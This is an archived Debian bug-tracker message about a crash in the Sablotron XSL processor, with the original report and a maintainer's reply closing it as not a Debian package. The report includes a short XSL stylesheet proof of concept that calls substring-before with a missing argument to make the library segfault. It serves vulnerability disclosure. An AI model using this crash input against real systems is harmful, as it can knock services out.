Bug#733457: marked as done (Security bug in Sablotron XSL processor)

Mon, 30 Dec 2013 00:06:38 -0800 

Your message dated Mon, 30 Dec 2013 10:03:47 +0200
with message-id <20131230080347.GA1688@sid.nuvreauspam>
and subject line Re: Bug#733457: Security bug in Sablotron XSL processor
has caused the Debian Bug report #733457,
regarding Security bug in Sablotron XSL processor
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
733457: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=733457
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message --- 
Package: sablotron
Version: 1.0.3-1
Severity: Critical

Sablotron uses unmapped memory to parse argument objects.  If an attacker
can map this area of memory, they may be able to cause the application to
act in an unintended way.  I did not research the possibility of code
execution.

In https://github.com/lindes/sablotron/blob/master/src/engine/expr.cpp,
starting on line 3094, the code fails to check the presence of arguments in
the substring-before and substring-after functions.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7b79316 in Expression::tostring(Situation&, Str&) ()
   from /home/daybreak/sablorelease/src/engine/.libs/libsablot.so.0

PoC is attached.

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"; $

<xsl:template match="/">
    <xsl:call-template name="urlResolver">
        <xsl:with-param name="input" select="hello" />
    </xsl:call-template>
</xsl:template>

<xsl:template name="urlResolver">
    <xsl:param name="input" />
    <xsl:variable name="testVar" select="substring-before('CRASH')"/>
</xsl:template>

</xsl:stylesheet>

--- End Message ---
--- Begin Message --- 
On Sb, 28 dec 13, 18:21:20, johnvillamil2010 . wrote:
> Package: sablotron
> Version: 1.0.3-1

This package is not in Debian, please report this bug to where you 
obtained the package from.

Thanks,
Andrei
-- 
http://wiki.debian.org/FAQsFromDebianUser
Offtopic discussions among Debian users and developers:
http://lists.alioth.debian.org/mailman/listinfo/d-community-offtopic
http://nuvreauspam.ro/gpg-transition.txt

Attachment: signature.asc
Description: Digital signature


--- End Message ---

Reply via email to